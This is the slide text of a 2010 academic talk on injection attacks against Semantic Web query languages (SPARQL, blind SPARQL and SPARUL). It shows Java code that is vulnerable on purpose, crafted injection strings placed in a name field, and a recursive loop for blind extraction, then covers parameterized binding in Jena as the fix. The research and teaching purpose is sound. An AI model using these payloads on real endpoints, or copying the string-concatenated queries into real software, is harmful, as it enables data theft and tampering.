Upload
pablo-orduna
View
1.437
Download
1
Tags:
Embed Size (px)
DESCRIPTION
Presenation at JSWEB2010, Valencia, September 2010
Citation preview
img/deustotech.png
IntroductionVulnerable code samples
Addressing code injectionConclusions
Addressing Security Issues in the Semantic Web:Injection attacks in the Semantic Query Languages
Pablo Orduna, Aitor Almeida, Unai Aguilera, Xabier Laiseca,Diego Lopez-de-Ipina, Aitor Gomez-Goiri
September 9th, 2010
Future Internet - Elkarlaneko ikerkuntza estrategikorako programa;ETORTEK 2008
P. Orduna, A. Almeida, U. Aguilera, X. Laiseca, D. Lopez-de. . . Addressing Security Issues in the Semantic Web: Injection att. . .
img/deustotech.png
IntroductionVulnerable code samples
Addressing code injectionConclusions
IntroductionQuery LanguagesSecurity issues
Introduction
The Semantic Web is based on a set of technologies:
XMLRDFOWL. . .
P. Orduna, A. Almeida, U. Aguilera, X. Laiseca, D. Lopez-de. . . Addressing Security Issues in the Semantic Web: Injection att. . .
img/deustotech.png
IntroductionVulnerable code samples
Addressing code injectionConclusions
IntroductionQuery LanguagesSecurity issues
Query Languages
New technologies have been developed to query the ontologies
RDQLlater−−−→ SPARQL
later−−−→ SPARULThese new query languages are based on SQLRDQL and SPARQL → Read-only query languages
SPARUL (SPARQL/Update)introduces−−−−−−−→ modification
capabilities
SPARQL Sample:
1 PREFIX injection: <http://www.morelab.deusto.es/injection.owl#>
2 SELECT ?p13 WHERE {4 ?p1 a injection:Person .5 }
P. Orduna, A. Almeida, U. Aguilera, X. Laiseca, D. Lopez-de. . . Addressing Security Issues in the Semantic Web: Injection att. . .
img/deustotech.png
IntroductionVulnerable code samples
Addressing code injectionConclusions
IntroductionQuery LanguagesSecurity issues
Security issues
The use of these new query languages introduce vulnerabilitiesalready found in a bad use of query languages
Attacks like SQL Injection, LDAP Injection or even XPathInjection are already well knownLibraries provide tools to sanitize user input in these languages
A proper usage of the query languages is required in order toface new techniques, including:
(Blind) SPARQL InjectionSPARUL Injection
P. Orduna, A. Almeida, U. Aguilera, X. Laiseca, D. Lopez-de. . . Addressing Security Issues in the Semantic Web: Injection att. . .
img/deustotech.png
IntroductionVulnerable code samples
Addressing code injectionConclusions
SPARQL InjectionBlind SPARQL InjectionSPARUL Injection
SPARQL Injection
Introducing SPARQL InjectionThe following query is assumed to retrieve the friends of a userwhom fullName is provided by the variable nameThe ontology is available inhttp://www.morelab.deusto.es/injection.owl
P. Orduna, A. Almeida, U. Aguilera, X. Laiseca, D. Lopez-de. . . Addressing Security Issues in the Semantic Web: Injection att. . .
img/deustotech.png
IntroductionVulnerable code samples
Addressing code injectionConclusions
SPARQL InjectionBlind SPARQL InjectionSPARUL Injection
SPARQL Injection
1 String queryString =2 "PREFIX injection: <http://www.morelab.deusto.es
/injection.owl#> " +3 "SELECT ?name1 ?name2 " +4 "WHERE {" +5 " ?p1 a injection:Person . " +6 " ?p2 a injection:Person . " +7 " ?p1 injection:fullName ’" + name + "’ . "
+8 " ?p1 injection:isFriendOf ?p2 . " +9 " ?p1 injection:fullName ?name1 . " +
10 " ?p2 injection:fullName ?name2 . " +11 "}";12 Query query = QueryFactory.create(queryString);
P. Orduna, A. Almeida, U. Aguilera, X. Laiseca, D. Lopez-de. . . Addressing Security Issues in the Semantic Web: Injection att. . .
img/deustotech.png
IntroductionVulnerable code samples
Addressing code injectionConclusions
SPARQL InjectionBlind SPARQL InjectionSPARUL Injection
SPARQL Injection
Introducing SPARQL Injection
This code can be exploited to retrieve any information in theontologyThe problem is that the variable name has not been sanitized
This variable can include SPARQL code, and thus modify thequery itselfA variable with malicious content can be found in the nextslide
P. Orduna, A. Almeida, U. Aguilera, X. Laiseca, D. Lopez-de. . . Addressing Security Issues in the Semantic Web: Injection att. . .
img/deustotech.png
IntroductionVulnerable code samples
Addressing code injectionConclusions
SPARQL InjectionBlind SPARQL InjectionSPARUL Injection
Appending the Strings
1 String queryString =2 "PREFIX injection: <http://www.morelab.deusto.es
/injection.owl#> " +3 "SELECT ?name1 ?name2 WHERE {" +4 " ?p1 a injection:Person . " +5 " ?p2 a injection:Person . " +6 " ?p1 injection:fullName ’" + name + "’ . " +7 " ?p1 injection:isFriendOf ?p2 . " +8 " ?p1 injection:fullName ?name1 . " +9 " ?p2 injection:fullName ?name2 . " +
10 "}";11 String name = "Pablo Orduna’ . " +12 "?b1 a injection:Building . " +13 "?b1 injection:name ?name1 . " +14 "} #";
P. Orduna, A. Almeida, U. Aguilera, X. Laiseca, D. Lopez-de. . . Addressing Security Issues in the Semantic Web: Injection att. . .
img/deustotech.png
IntroductionVulnerable code samples
Addressing code injectionConclusions
SPARQL InjectionBlind SPARQL InjectionSPARUL Injection
Appending the Strings
1 String queryString =2 "PREFIX injection: <http://www.morelab.deusto.es
/injection.owl#> " +3 "SELECT ?name1 ?name2 WHERE {" +4 " ?p1 a injection:Person . " +5 " ?p2 a injection:Person . " +6 " ?p1 injection:fullName ’" + "Pablo Orduna’ .
" +7 " ?b1 a injection:Building . " +8 " ?b1 injection:name ?name1 . " +9 " } #" + "’ . " +
10 " ?p1 injection:isFriendOf ?p2 . " +11 " ?p1 injection:fullName ?name1 . " +12 " ?p2 injection:fullName ?name2 . " +13 "}";
P. Orduna, A. Almeida, U. Aguilera, X. Laiseca, D. Lopez-de. . . Addressing Security Issues in the Semantic Web: Injection att. . .
img/deustotech.png
IntroductionVulnerable code samples
Addressing code injectionConclusions
SPARQL InjectionBlind SPARQL InjectionSPARUL Injection
The final query
1 String queryString =2 "PREFIX injection: <http://www.morelab.deusto.es
/injection.owl#> " +3 "SELECT ?name1 ?name2 WHERE {" +4 " ?p1 a injection:Person . " +5 " ?p2 a injection:Person . " +6 " ?p1 injection:fullName ’Pablo Orduna’ . " +7 " ?b1 a injection:Building . " +8 " ?b1 injection:name ?name1 . " +9 " } #" + /* From this point everything
10 is commented and thus ignored */ "’ . " +11 " ?p1 injection:isFriendOf ?p2 . " +12 " ?p1 injection:fullName ?name1 . " +13 " ?p2 injection:fullName ?name2 . " +14 "}";
P. Orduna, A. Almeida, U. Aguilera, X. Laiseca, D. Lopez-de. . . Addressing Security Issues in the Semantic Web: Injection att. . .
img/deustotech.png
IntroductionVulnerable code samples
Addressing code injectionConclusions
SPARQL InjectionBlind SPARQL InjectionSPARUL Injection
SPARQL Injection
This code will return the name of the building instead of thename of a user
It is possible to use the flexibility of SPARQL to perform otherkind of queries retrieving any information in the ontology
P. Orduna, A. Almeida, U. Aguilera, X. Laiseca, D. Lopez-de. . . Addressing Security Issues in the Semantic Web: Injection att. . .
img/deustotech.png
IntroductionVulnerable code samples
Addressing code injectionConclusions
SPARQL InjectionBlind SPARQL InjectionSPARUL Injection
Blind SPARQL Injection
Introducing Blind SPARQL InjectionThe previous sample was especially vulnerable since it returneda string
It is possible to retrieve any information as a stringStrings are usually not retrieved in SPARQL, but individuals
What if the returning value is an individual?
It’s still possible to retrieve any informationIf it’s possible to know if a given query is true or false, it’spossible to iteratively retrieve any information
The following code retrieves the individuals themselves
It’s possible to know if the query provided or not theindividuals
P. Orduna, A. Almeida, U. Aguilera, X. Laiseca, D. Lopez-de. . . Addressing Security Issues in the Semantic Web: Injection att. . .
img/deustotech.png
IntroductionVulnerable code samples
Addressing code injectionConclusions
SPARQL InjectionBlind SPARQL InjectionSPARUL Injection
Blind SPARQL Injection
1 String queryString =2 "PREFIX xsd: <http://www.w3.org/2001/XMLSchema#>
" +3 "PREFIX injection: <http://www.morelab.deusto.es
/injection.owl#> " +4 "SELECT ?p1 ?p2 " +5 "WHERE {" +6 " ?p1 a injection:Person . " +7 " ?p2 a injection:Person . " +8 " ?p1 injection:fullName ’" + name + "’ˆˆxsd
:string . " +9 " ?p1 injection:isFriendOf ?p2 . " +
10 "}";11 Query query = QueryFactory.create(queryString);
P. Orduna, A. Almeida, U. Aguilera, X. Laiseca, D. Lopez-de. . . Addressing Security Issues in the Semantic Web: Injection att. . .
img/deustotech.png
IntroductionVulnerable code samples
Addressing code injectionConclusions
SPARQL InjectionBlind SPARQL InjectionSPARUL Injection
Blind SPARQL Injection
Once again, the variable name has not been sanitized
So it’s still possible to inject SPARQL codeThe injected code can’t return a building or the building nameBut, adding a condition like “does the building name start bythis letter” we will get:
The common results → so the building name starts by thatletterNo results → so the building name does not start by thatletter
P. Orduna, A. Almeida, U. Aguilera, X. Laiseca, D. Lopez-de. . . Addressing Security Issues in the Semantic Web: Injection att. . .
img/deustotech.png
IntroductionVulnerable code samples
Addressing code injectionConclusions
SPARQL InjectionBlind SPARQL InjectionSPARUL Injection
Blind SPARQL Injection
1 String queryString = /* PREFIXES ... */2 "SELECT ?p1 ?p2 " +3 "WHERE {" +4 " ?p1 a injection:Person . " +5 " ?p2 a injection:Person . " +6 " ?p1 injection:fullName ’" + name + "’ˆˆxsd
:string . " +7 " ?p1 injection:isFriendOf ?p2 . " +8 "}";9 String name = "Pablo Orduna’ . " +
10 "?b1 a injection:Building . " +11 "?b1 injection:name ?buildingName . " +12 "FILTER regex(?buildingName, \"ˆ" + s + ".*\")
. " +13 "} #"; // }:-D
P. Orduna, A. Almeida, U. Aguilera, X. Laiseca, D. Lopez-de. . . Addressing Security Issues in the Semantic Web: Injection att. . .
img/deustotech.png
IntroductionVulnerable code samples
Addressing code injectionConclusions
SPARQL InjectionBlind SPARQL InjectionSPARUL Injection
The final query would be. . .
1 "PREFIX xsd: <http://www.w3.org/2001/XMLSchema#>" +
2 "PREFIX injection: <http://www.morelab.deusto.es/injection.owl#> " +
3 "SELECT ?p1 ?p2 WHERE {" +4 " ?p1 a injection:Person . " +5 " ?p2 a injection:Person . " +6 " ?p1 injection:fullName ’Pablo Orduna’ . " +7 " ?b1 a injection:Building . " +8 " ?b1 injection:name ?buildingName . " +9 " FILTER regex(?buildingName, \"ˆ" + s + ".*\")
. " +10 " } #" + /* from here ignored*/ "’ˆˆxsd:string .
" +11 " ?p1 injection:isFriendOf ?p2 . }";
P. Orduna, A. Almeida, U. Aguilera, X. Laiseca, D. Lopez-de. . . Addressing Security Issues in the Semantic Web: Injection att. . .
img/deustotech.png
IntroductionVulnerable code samples
Addressing code injectionConclusions
SPARQL InjectionBlind SPARQL InjectionSPARUL Injection
Querying recursively. . .
1 public static String recursively(String letters)throws Exception{
2 for(int i = 0; i < POSSIBLE_LETTERS.length(); ++i){
3 char c = POSSIBLE_LETTERS.charAt(i);4 if(tryBlind(letters + c)){5 System.out.println(c);6 return "" + c + recursively(letters + c);7 }8 }9 return "";
10 }
P. Orduna, A. Almeida, U. Aguilera, X. Laiseca, D. Lopez-de. . . Addressing Security Issues in the Semantic Web: Injection att. . .
img/deustotech.png
IntroductionVulnerable code samples
Addressing code injectionConclusions
SPARQL InjectionBlind SPARQL InjectionSPARUL Injection
Blind SPARQL Injection
It is possible to optimize this system using binary search
Performing queries using Regular Expressions like ˆ[A-M].*to know if the char is between the char A and MGiven a charset of length 64, we would reduce the number ofiterations from 64 times 10 (640) to 6 times 10 (60)
Using the whole UTF-16 charset, it would reduce the numberof iterations from 65536 times 10 (655360) to 16 times 10(160)
The point is that it’s possible to retrieve any information inthe ontology independently from the values returned by thequery
P. Orduna, A. Almeida, U. Aguilera, X. Laiseca, D. Lopez-de. . . Addressing Security Issues in the Semantic Web: Injection att. . .
img/deustotech.png
IntroductionVulnerable code samples
Addressing code injectionConclusions
SPARQL InjectionBlind SPARQL InjectionSPARUL Injection
SPARUL Injection
Introducing SPARQL/Update Injection
All the previous examples are executed in read-only querylanguagesSPARUL introduces the chance to modify the ontology
INSERT, MODIFY and DELETE statements are available
The following sample modifies the fullName of the resourceinjection:Pablo, setting it to the value of the variable name
P. Orduna, A. Almeida, U. Aguilera, X. Laiseca, D. Lopez-de. . . Addressing Security Issues in the Semantic Web: Injection att. . .
img/deustotech.png
IntroductionVulnerable code samples
Addressing code injectionConclusions
SPARQL InjectionBlind SPARQL InjectionSPARUL Injection
SPARUL Injection
1 String updateString = "PREFIX injection: <http://www.morelab.deusto.es/injection.owl#> " +
2 "PREFIX xsd: <http://www.w3.org/2001/XMLSchema#>" +
3 "DELETE {" +4 " injection:Pablo injection:fullName ?name1 "+5 "} WHERE {" +6 " injection:Pablo injection:fullName ?name1" +7 "}\n INSERT {" +8 " injection:Pablo injection:fullName ’" + name +
"’ˆˆxsd:string" +9 "}";
10 UpdateRequest update = UpdateFactory.create(updateString);
P. Orduna, A. Almeida, U. Aguilera, X. Laiseca, D. Lopez-de. . . Addressing Security Issues in the Semantic Web: Injection att. . .
img/deustotech.png
IntroductionVulnerable code samples
Addressing code injectionConclusions
SPARQL InjectionBlind SPARQL InjectionSPARUL Injection
SPARUL Injection
1 String name = "Pablo Ordunya’ˆˆxsd:string" +2 "} \n " +3 "INSERT {" +4 " injection:Pablo injection:isFriendOf
injection:EvilMonkey" +5 "} #"; // }:-D6 String result = sample.run(name);
With this vulnerability, it is possible to modify the wholeontology.
P. Orduna, A. Almeida, U. Aguilera, X. Laiseca, D. Lopez-de. . . Addressing Security Issues in the Semantic Web: Injection att. . .
img/deustotech.png
IntroductionVulnerable code samples
Addressing code injectionConclusions
Introduction
Addressing code injection
Mechanisms provided by the library must be used (if provided)
Not as simple as scaping the ’ characters: the string \u0027 isa simple quote, just as in Java
1 System.out.println("a\u0022.length() +\u0022b".length());
2 // This code prints "2", the result of("a".length() + "b".length())
3 // since \u0022 will be replaced by "even if it is commented or inside
4 // String
P. Orduna, A. Almeida, U. Aguilera, X. Laiseca, D. Lopez-de. . . Addressing Security Issues in the Semantic Web: Injection att. . .
img/deustotech.png
IntroductionVulnerable code samples
Addressing code injectionConclusions
Introduction
Frameworks
In Jena, the initialBinding argument can be used in theQueryExecutionFactory
1 // initial binding2 QuerySolutionMap initialBinding = new
QuerySolutionMap();3 RDFNode parameterizedName = model.createLiteral(
name);4 initialSetting.add("thename", parameterizedName);5
6 // Perform the query7 Query query = QueryFactory.create(queryString);8 QueryExecution qe = QueryExecutionFactory.create(
query, model, initialBinding);9 ResultSet results = qe.execSelect();
P. Orduna, A. Almeida, U. Aguilera, X. Laiseca, D. Lopez-de. . . Addressing Security Issues in the Semantic Web: Injection att. . .
img/deustotech.png
IntroductionVulnerable code samples
Addressing code injectionConclusions
Conclusions
Not sanitizing the user input might add a set of securityvulnerabilities in our systems
In the paper it is presented how new query languages inheritsecurity issues present in older query languages, and thereforethey should also be taken into account when working withthem
P. Orduna, A. Almeida, U. Aguilera, X. Laiseca, D. Lopez-de. . . Addressing Security Issues in the Semantic Web: Injection att. . .
img/deustotech.png
IntroductionVulnerable code samples
Addressing code injectionConclusions
Questions?
DeustoTech - Internet
http://www.morelab.deusto.es
Pablo Orduna [email protected]
Aitor Almeida [email protected]
Unai Aguilera [email protected]
Xabier Laiseca [email protected]
Diego Lopez-de-Ipina [email protected]
Aitor Gomez-Goiri [email protected]
P. Orduna, A. Almeida, U. Aguilera, X. Laiseca, D. Lopez-de. . . Addressing Security Issues in the Semantic Web: Injection att. . .